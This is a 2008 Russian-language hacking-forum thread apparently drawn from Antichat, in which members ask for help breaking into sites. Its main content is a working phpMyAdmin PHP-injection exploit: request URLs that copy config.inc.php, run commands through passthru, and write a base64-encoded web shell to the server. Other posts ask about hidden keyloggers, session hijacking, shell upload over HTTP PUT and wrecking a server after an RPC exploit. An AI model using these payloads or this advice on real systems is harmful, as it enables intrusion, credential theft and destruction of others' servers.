Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. 777DEMYAN777

    777DEMYAN777 Elder - Старейшина

    Joined:
    31 May 2008
    Messages:
    48
    Likes Received:
    12
    Reputations:
    0
    какой посоветуете? и чтобы юзер не заметил, пожалуйста ссылку дайте
     
  2. 777DEMYAN777

    777DEMYAN777 Elder - Старейшина

    Joined:
    31 May 2008
    Messages:
    48
    Likes Received:
    12
    Reputations:
    0
    Посоветуйте пожалуйста
     
  3. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    кто может сказать где в установленой друпал хранится пароль от базы?)) чет найти не могу(
     
  4. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Напиши сам под драйвера клавиатуры жертвы! Самый надежный способ + не спалишься!
     
  5. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Подделал PHPSESSID на сайте плагином от фаирфокса.И не сработало ниче =_=.В таблице xoops_session есть также sess_ip,sess_data,sess_id(его я и подделал),но в куках передаётся _utmb _utmc _utma _utmz hotlog и b,помимо PHPSESSID.Сайт в виде site.ru,ибо форумные куки отличаются.Что делать дальше не знаю,так как пробывал и другие идентификаторы сессии менять.А расшифровать ид сессии,насколько я знаю,не представляется возможным.
     
  6. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    Хм... скорее всего ид привязонно к ип !и подделов ид не получишь доступа! Есче вопросик а зачем ты заморачиваешься если у тебя есть доступ к базе ?
     
  7. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    Вопрос такой:
    Последняя бага в phpMyAdmin (_http://www.securitylab.ru/vulnerability/359583.php):
    1) Исходник бажного кода:
    Code:
    $sort_function = '
                return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);
            ';
    usort($databases, create_function('$a, $b', $sort_function));
    
    Сам сплоит:
    server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec ('cp $(pwd)"/config.inc.php" config.txt');//&sort_order=desc&token=825fdd1c5f1c43a450de3af6f6d34b22


    Бага в принципе понятна - отсуствие фильтрации при использовании переменных в создаваемой функции.
    Тем не менне, эта бага нигде не работает. У меня.
    Да и еще exec - я понимаю, php, но при чём тут тогда оператор OR?

    P.S. magic_quotes=Off
    token валидный
     
    #3367 1ten0.0net1, 28 Sep 2008
    Last edited: 28 Sep 2008
  8. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    PHP:
    <?
    $sort_by='"]) || exec(\'cp $(pwd)"/config.inc.php" config.txt\'); //';
    $sort_order='desc';

    $sort_function '
                return ' 
    . ($sort_order == 'ASC' : -1) . ' * ' $sorter '($a["' $sort_by '"], $b["' $sort_by '"]);
            '
    ;
    echo 
    $sort_function;

    create_function('$a, $b'$sort_function)
    ?>

    мы просто тактично делаем пхп инжект

    вот что мы получим в $sort_function

    я изменил or на ||
    это просто логическое условие, что заставляет выполнятся наш код...
     
    _________________________
    4 people like this.
  9. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    Так, то что || и OR эквивалентны буду знать. Под рутом, с правами на запись и при exec разрешенном все-равно не работает(

    UPDATE.


    Приведенный мной код сорцов - это 2.11.4, автор уязвимости утверждает, что
    The problem also occurs in phpMyAdmin-2.x but it is not as easy to exploit as in 3.0
    I will publish more informations some days after the patch is released
    так что эксплоит для второй ветки, видимо, выглядит несколько иначе, чем приведённый выше.... Кто-нить может помочь с этим?

    P.S. http://www.the-wildcat.de/phpmyadmin-code-execution-vulnerability/ - вот тут все нюансы.

    UPDATE

    для второй ветки написано MySQL < 5 и Option NaturalOrder должна быть установлена. Что это за оция?


    Коммент от товарища desTiny

    видимо, нюансы возникли из-за коммента - /**
    * apply limit and order manually now
    * (caused by older MySQL < 5 or $GLOBALS['cfg']['NaturalOrder'])
    */

    вот - /**
    * if $GLOBALS['cfg']['NaturalOrder'] is enabled, we cannot use LIMIT
    * cause MySQL does not support natural ordering, we have to do it afterward
    */

    Интересен также код:
    PHP:
    if ($GLOBALS['cfg']['NaturalOrder']) {
                
    $limit '';
            } else {
                if (
    $limit_count) {
                    
    $limit ' LIMIT ' $limit_count ' OFFSET ' $limit_offset;
                }
     
                
    $apply_limit_and_order_manual false;
            }

    DesTiny (15:57:36 28/09/2008)
    если оно установлено ИЛИ версия мускуля <=4 то сортировка происходит вручную

    DesTiny (15:57:47 28/09/2008)
    посредством создаваемой функции

    me (15:58:03 28/09/2008)
    то есть для исользования баги

    me (15:58:16 28/09/2008)
    сортировка должна осуществляться вручную

    DesTiny (15:58:20 28/09/2008)
    да

    me (15:58:22 28/09/2008)
    следовательно -

    me (15:58:31 28/09/2008)
    $GLOBALS['cfg']['NaturalOrder'] - должна быть установлена

    me (15:58:33 28/09/2008)
    или

    me (15:58:38 28/09/2008)
    MySQL < 5
     
    #3369 1ten0.0net1, 28 Sep 2008
    Last edited: 28 Sep 2008
  10. procedure

    procedure Elder - Старейшина

    Joined:
    22 Dec 2007
    Messages:
    527
    Likes Received:
    257
    Reputations:
    46
    Скажите пожалуйста вывод:
    Warning: Smarty error: a_eshop_show_info: missing 'item' parameter in /home/hosting/******/_engine/lib/smarty/Smarty.class.php on line 1042

    Это скуль? Что то уже 2ой день над ней парюсь и без результатно. Может эта какая либо ошибка в скрипте?
     
  11. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    2 1ten0.0net1:

    Посмотрев на исходник - вижу структуру:

    PHP:
    $apply_limit_and_order_manual true;
     
        if (
    PMA_MYSQL_INT_VERSION >= 50002) {
            ...
            if (
    $GLOBALS['cfg']['NaturalOrder']) {
                ...
            } else {
                ...
                
    $apply_limit_and_order_manual false;
            }
    }else{
    ...
    }
    if (
    $apply_limit_and_order_manual) {
     
            if (
    $GLOBALS['cfg']['NaturalOrder']) {
                
    $sorter 'strnatcasecmp';
            } else {
                
    $sorter 'strcasecmp';
            }
     
            
    // produces f.e.:
            // return -1 * strnatcasecmp($a["SCHEMA_TABLES"], $b["SCHEMA_TABLES"])
            
    $sort_function '
                return ' 
    . ($sort_order == 'ASC' : -1) . ' * ' $sorter '($a["' $sort_by '"], $b["' $sort_by '"]);
            '
    ;
     
            
    usort($databasescreate_function('$a, $b'$sort_function));
    }
    Если реально есть php-инжект, то MySQL<5 или $GLOBALS['cfg']['NaturalOrder'].

    Тогда надо извращаться с
    PHP:
    $sort_function '
                return ' 
    . ($sort_order == 'ASC' : -1) . ' * ' $sorter '($a["' $sort_by '"], $b["' $sort_by '"]);
    Не имея всего скрипта, проверять не могу - но предполагаю, что надо что-то типа

    PHP:
    $sort_by SCHEMA_TABLES"], $b["SCHEMA_TABLES"])*(eval("print 'xek';")==1?1:0);//
     
  12. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389

    Это не скуль, а ошибка в отсутствии переменной item обработчика шаблонов Smarty. Лучше ответьте на вопрос выше)
     
    #3372 1ten0.0net1, 28 Sep 2008
    Last edited: 28 Sep 2008
  13. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    1ten0.0net1, у меня версия phpMyAdmin 2.11.4, и бага отлично работает - создает копию config.inc.php в корне директории с именем config.txt. Проверь права и владельца апача и директории

    ЗЫ.
    Code:
    http://127.0.0.1/pma/server_databases.php?pos=0&dbstats=0&sort_by="]) OR passthru($_GET[ccmd]); //&sort_order=desc&token=[my_valid_token]&ccmd=ls
    :)

    ЗЗЫ. Заливка простого шелла
    Code:
    http://127.0.0.1/pma/server_databases.php?pos=0&dbstats=0&sort_by="]) OR file_put_contents('config.php',base64_decode('PD8gcGFzc3RocnUoJF9HRVRbY2NtZF0pOyA/Pg==')); //&sort_order=desc&token=[my_valid_token]
     
    #3373 krypt3r, 29 Sep 2008
    Last edited: 29 Sep 2008
    1 person likes this.
  14. procedure

    procedure Elder - Старейшина

    Joined:
    22 Dec 2007
    Messages:
    527
    Likes Received:
    257
    Reputations:
    46
    Можно ли узнать что за админка по url. Если кому то знакома сылка, подскажите плиз.
    admin.php?pd=&7900&md=control_access&inst=&
     
    2 people like this.
  15. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Нет доступа к админке.
     
    #3375 Велемир, 29 Sep 2008
    Last edited: 29 Sep 2008
    1 person likes this.
  16. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    а данные к админке есть в базе ? )) или file_priv ?
     
  17. pvc

    pvc New Member

    Joined:
    22 Dec 2006
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Кто сможет подсказать.
    Есть папка на сайте ../forum/upload
    по умолчанию она 403
    но права на запись в неё есть через HTTP-PUT
    как можно организовать туда заливку шелла?

    гуглил сегодня весь день.
    в итоге смог туда записывать текстоивки,картинки и html делал запись с помощью браузера Amaya а вот php никак не удаётся запихать(
     
  18. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    И так вот сканил очередной сервер обнаружил там открытый порт 135 (RPC) сразу же не думая врубил эксплоит под этот порт.....
    Выскочила надпись

    Connected to shell...

    Я обрадовался но.........
    Что теперь делать???
    Я в том смысле что тачка удаленная и мне нужно следуйщее
    Создать пользователя(админа), узнать пароль от дефолтного админа (то есть каторый стоял до создания профиля моего тама, под каким именем заходит не знаю), рас***рить сервер(хз как), то есть сделать макс плохое ему можно даже чтобы железо полетело!
     
  19. [Dezzter]

    [Dezzter] Elder - Старейшина

    Joined:
    26 Nov 2007
    Messages:
    182
    Likes Received:
    131
    Reputations:
    3
    Непохек, это глупо, мне жалко таких людей которые это делают
     
  20. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    [Dezzter] может харе срать? а?
    твое мнение не кому не интересно что тебе нравиться что тебе нравиться а что нет

    [Dezzter] ГО МОДЕРУ В ЛИЧКУ СРАТЬ, МЕГО-ХАКЕР!
     
    #3380 diznt, 30 Sep 2008
    Last edited: 30 Sep 2008
Thread Status:
Not open for further replies.